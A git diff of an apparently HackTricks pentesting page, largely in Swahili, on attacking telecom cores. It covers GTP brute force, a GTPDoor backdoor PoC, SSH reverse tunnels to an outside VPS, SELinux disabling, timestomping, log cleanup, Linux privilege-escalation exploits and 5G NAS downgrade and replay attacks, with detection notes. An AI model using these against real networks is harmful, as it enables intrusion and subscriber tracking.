diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md index a88f7aa6f..7215523ce 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md +++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md @@ -1,27 +1,27 @@ -# Telecom Network Exploitation (GTP / Roaming Environments) +# Utekaji wa Mtandao wa Telecom (GTP / Roaming Environments) {{#include ../../banners/hacktricks-training.md}} > [!NOTE] -> Protokali za msingi za simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupita kwenye mifumo ya GRX/IPX ya kuhamahama ambayo inaaminika kwa kiasi fulani. Kwa sababu zinatumia UDP bila uthibitisho wowote, **mara nyingi mguu wowote ndani ya mipaka ya telecom unaweza kufikia moja kwa moja ndege za ishara za msingi**. Maelezo yafuatayo yanakusanya mbinu za mashambulizi zilizoshuhudiwa katika mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC. +> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) mara nyingi husafiri kwenye semi-trusted GRX/IPX roaming backbones. Kwa sababu zinatumia UDP wazi bila uthibitisho mwingi, **nafasi ya kuingia ndani ya mipaka ya telecom mara nyingi inaweza kufikia ngazi za uashiriaji za msingi moja kwa moja**. Vidokezo vinavyoifuata vinakusanya mbinu za mashambulizi zilizoshuhudiwa kwenye mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC. -## 1. Recon & Initial Access +## 1. Uchunguzi & Upataji wa Awali -### 1.1 Default OSS / NE Accounts -Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force: +### 1.1 Akaunti za OSS / NE za Chaguo-msingi +Seti kubwa, kwa mshangao, ya vendor network elements huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha maalum ya maneno (wordlist) inaongeza kwa kiasi kikubwa mafanikio ya brute-force: ```bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt ``` -Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini). +Ikiwa kifaa kinatoa management VRF pekee, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini). -### 1.2 Ugunduzi wa Mwenyeji ndani ya GRX/IPX -Watoa huduma wengi wa GRX bado wanaruhusu **ICMP echo** kupitia msingi. Changanya `masscan` na uchunguzi wa `gtpv1` UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C: +### 1.2 Ugundaji wa Host ndani ya GRX/IPX +Wengi wa waendeshaji wa GRX bado huruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na probe za UDP zilizojengwa `gtpv1` ili ramani kwa haraka wasikilizi wa GTP-C: ```bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 ``` -## 2. Kuorodhesha Wajibu – `cordscan` +## 2. Kuorodhesha Abonenti – `cordscan` -Zana hii ya Go inatengeneza **GTP-C Create PDP Context Request** pakiti na kurekodi majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja. +Zana ifuatayo ya Go inatengeneza vifurushi vya **GTP-C Create PDP Context Request** na inarekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN aliyotembelewa na abonenti. ```bash # Build GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan @@ -29,22 +29,22 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan # Usage (typical): ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap ``` -Key flags: -- `--imsi` Lengo la mteja IMSI -- `--oper` Nyumbani / HNI (MCC+MNC) -- `-w` Andika pakiti za raw kwenye pcap +Bendera kuu: +- `--imsi` IMSI ya mteja lengwa +- `--oper` Home / HNI (MCC+MNC) +- `-w` Andika vifurushi ghafi kwenye pcap -Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana: +Vigezo muhimu ndani ya binary vinaweza kurekebishwa ili kupanua skani: ``` pingtimeout = 3 // seconds before giving up pco = 0x218080 common_tcp_ports = "22,23,80,443,8080" ``` -## 3. Utekelezaji wa Kanuni kupitia GTP – `GTPDoor` +## 3. Code Execution over GTP – `GTPDoor` -`GTPDoor` ni huduma ndogo ya ELF ambayo **inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja**. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia `/bin/sh -c`. Stdout/stderr zinahamishwa ndani ya **Echo Response** ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa. +`GTPDoor` ni huduma ndogo ya ELF ambayo **inasikiliza UDP 2123 na inachambua kila packet ya GTP-C inayokuja**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya **Echo Response** messages ili hakuna outward session ipatikane. -Pakiti ya PoC ya chini (Python): +Minimal PoC packet (Python): ```python import gtpc, Crypto.Cipher.AES as AES key = b"SixteenByteKey!" @@ -52,38 +52,38 @@ cmd = b"id;uname -a" enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) ``` -Detection: -* mwenyeji yeyote anayepeleka **Maombi ya Echo yasiyo sawa** kwa IP za SGSN -* Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) – mabadiliko kutoka kwa spesifiki +Utambuzi: +* host yoyote inayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN +* bendera ya GTP version imewekwa kwa 1 wakati message type = 1 (Echo) – deviation from spec ## 4. Pivoting Through the Core ### 4.1 `sgsnemu` + SOCKS5 -`OsmoGGSN` inatoa emulators ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha `tun0` kinachoweza kufikiwa kutoka kwa mwenzi wa roaming. +`OsmoGGSN` hutoa SGSN emulator inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara baada ya makubaliano, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer. ```bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ -APN internet -c 1 -d ip route add 172.16.0.0/12 dev tun0 microsocks -p 1080 & # internal SOCKS proxy ``` -Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye **data plane**. +Kwa hair-pinning sahihi ya firewall, tunnel hii inapita kando ya signalling-only VLANs na inakuweka moja kwa moja kwenye **data plane**. -### 4.2 SSH Reverse Tunnel juu ya Port 53 -DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama. Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani: +### 4.2 SSH Reverse Tunnel over Port 53 +DNS karibu kila mara iko wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwa VPS yako ikisikiliza kwenye :53, kisha rudi nyumbani baadaye: ```bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com ``` -Check that `GatewayPorts yes` is enabled on the VPS. +Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS. ## 5. Covert Channels -| Channel | Transport | Decoding | Notes | -|---------|-----------|----------|-------| -| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikivu safi, hakuna trafiki ya nje | -| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain | -| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inachanganyika na mazungumzo halali ya GTP-C | +| Chaneli | Usafirishaji | Kuutafsiri | Maelezo | +|---------|--------------|------------|---------| +| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji pasivu kabisa, hakuna trafiki ya kutoka | +| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) imekodishwa katika octets za rekodi A | inatazama sub-domain `*.nodep` | +| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob katika private IE | inajumuika na mazungumzo halali ya GTP-C | -All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed. +Implants zote zina watchdogs zinazofanya **timestomp** binaries zao na ku-re-spawn ikiwa zimecrash. ## 6. Defense Evasion Cheatsheet ```bash @@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp setenforce 0 # disable SELinux ``` -## 7. Kuinua Haki kwenye NE za Kizamani +## 7. Privilege Escalation kwenye Legacy NE ```bash # DirtyCow – CVE-2016-5195 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd @@ -111,30 +111,137 @@ python3 PwnKit.py # Sudo Baron Samedit – CVE-2021-3156 python3 exploit_userspec.py ``` -Usafi wa mazingira: +Kidokezo cha usafishaji: ```bash userdel firefart 2>/dev/null rm -f /tmp/sh ; history -c ``` -## 8. Tool Box +## 8. Zana -* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – zana za kawaida zilizoelezwa katika sehemu za awali. -* `FScan` : skanning ya TCP ya intranet (`fscan -p 22,80,443 10.0.0.0/24`) +* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – zana maalum zilizotajwa katika sehemu zilizopita. +* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`) * `Responder` : LLMNR/NBT-NS rogue WPAD -* `Microsocks` + `ProxyChains` : pivoting nyepesi wa SOCKS5 -* `FRP` (≥0.37) : NAT traversal / bridging ya mali +* `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5 +* `FRP` (≥0.37) : uvuka NAT / kuunganisha mali + +## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay + +Taratibu ya usajili ya 5G inaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe na Security Mode Command/Complete, ujumbe wa awali hauhakikiwa na haujasimbwa. Dirisha hili kabla ya usalama linaweza kuwezesha njia mbalimbali za kushambulia wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed). + +Mtiririko wa usajili (ulifupishwa): +- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa) na sifa/uwezo. +- Authentication: AMF/AUSF hutuma RAND/AUTN; UE hurudisha RES*. +- Security Mode Command/Complete: uadilifu na usimbaji wa NAS vinajadiliwa na kuanzishwa. +- PDU Session Establishment: usanidi wa IP/QoS. + +Vidokezo vya kuanzisha maabara (si-RF): +- Core: usanidi wa default wa Open5GS unatosha kuiga mtiririko. +- UE: simulator au UE ya majaribio; tumia Wireshark kuchambua. +- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB). +- Useful display filters in Wireshark: +- ngap.procedure_code == 15 (InitialUEMessage) +- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request) + +### 9.1 Faragha ya kitambulisho: kushindwa kwa SUCI kunachofichua SUPI/IMSI +Kinachotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa funguo ya umma ya home-network). Kupata SUPI/IMSI ya plaintext katika Registration Request kunaonyesha kasoro ya faragha inayoweza kuwezesha ufuatiliaji wa mteja kwa kudumu. + +Jinsi ya kujaribu: +- Kamua ujumbe wa kwanza wa NAS katika InitialUEMessage na kagua Mobile Identity IE. +- Uhakiki wa haraka wa Wireshark: +- Inapaswa kutafsiriwa kama SUCI, si IMSI. +- Mfano wa vichujio: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na kuwepo kwa `imsi` indicates leakage. + +Nini cha kukusanya: +- MCC/MNC/MSIN ikiwa imefunuliwa; rekodi kwa kila UE na fuatilia kwa muda/mahali. + +Kuzuia: +- Lazimisha UEs/USIMs zinazotuma SUCI pekee; toa tahadhari kwa IMSI/SUPI yoyote katika NAS ya awali. + +### 9.2 Kupungua kwa uwezo hadi algorithimu za null (EEA0/EIA0) +Asili: +- UE inatangaza EEA (encryption) na EIA (integrity) zinazotegemewa katika UE Security Capability IE ya Registration Request. +- Mepangilio ya kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algorithimu za null. + +Tatizo: +- Kwa sababu Registration Request haijalindwa kwa uadilifu, mshambuliaji aliye on-path anaweza kuzima bits za capability ili kulazimisha uteuzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks vibaya huwaruhusu algorithimu za null hata nje ya huduma za dharura. + +Hatua za kushambulia: +- Shika InitialUEMessage na badilisha NAS UE Security Capability ili itangaze EEA0/EIA0 tu. +- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kupeleka mbele. +- Angalia kama AMF inakubali ciphers/udhibiti za null na inakamilisha Security Mode kwa EEA0/EIA0. + +Uthibitisho/uwazi: +- Katika Wireshark, thibitisha algorithimu zilizochaguliwa baada ya Security Mode Command/Complete. +- Mfano wa matokeo ya passive sniffer: +``` +Encyrption in use [EEA0] +Integrity in use [EIA0, EIA1, EIA2] +SUPI (MCC+MNC+MSIN) 9997000000001 +``` +Mikakati ya kupunguza (lazima): +- Sanidi AMF/policy ili kukataa EEA0/EIA0 isipokuwa pale inapohitajika kwa umakini (mf., simu za dharura). +- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa onyo/alaramu kwa muktadha wowote wa usalama wa NAS unaojadiliana na null algorithms. + +### 9.3 Replay ya initial Registration Request (pre-security NAS) +Kwa sababu initial NAS haina integrity na freshness, InitialUEMessage+Registration Request iliyorekodiwa inaweza kureplayed kwa AMF. + +PoC rule for 5GReplay to forward matching replays: +```xml + + + + + + + + + + + +``` +Kile cha kuangalia: +- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa freshness/context validation unaonyesha udhaifu. + +Mitigations: +- Enforce replay protection/context binding kwenye AMF; rate-limit na correlate per-GNB/UE. + +### 9.4 Tooling pointers (reproducible) +- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS. +- Wireshark: hakiki decodes za NGAP/NAS; tumia filters zilizo juu kutenganisha Registration. +- 5GReplay: capture registration, kisha replay NGAP + NAS messages maalum kama ilivyo kwenye rule. +- Sni5Gect: live sniff/modify/inject NAS control-plane ili kulazimisha null algorithms au kuingilia authentication sequences. + +### 9.5 Defensive checklist +- Fuatilia kila wakati Registration Request kwa SUPI/IMSI zilizo wazi (plaintext); zuia vifaa/USIMs vinavyokiuka. +- Kataa EEA0/EIA0 isipokuwa taratibu za dharura zilizoelezwa kwa ukungu; hitaji angalau EEA2/EIA2. +- Gundua infrastructure haramu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers. +- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara za InitialUEMessage. --- ## Detection Ideas -1. **Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP**. -2. **Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH** kutoka kwa IP za ndani. -3. **Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana** – yanaweza kuashiria beacon za GTPDoor. -4. **Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano**. +1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**. +2. **Ports zisizo za kawaida (53, 80, 443) kupokea SSH handshakes** kutoka internal IPs. +3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** – inaweza kuashiria GTPDoor beacons. +4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence fields kubwa, zisizo sifuri**. +5. 5G: **InitialUEMessage yenye NAS Registration Requests zinazorudiwa kutoka identical endpoints** (replay signal). +6. 5G: **NAS Security Mode negotiating EEA0/EIA0** nje ya emergency contexts. ## References - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) - 3GPP TS 29.281 – GTPv2-C (v17.6.0) +- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) +- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS +- 3GPP TS 33.501 – Security architecture and procedures for 5G System {{#include ../../banners/hacktricks-training.md}}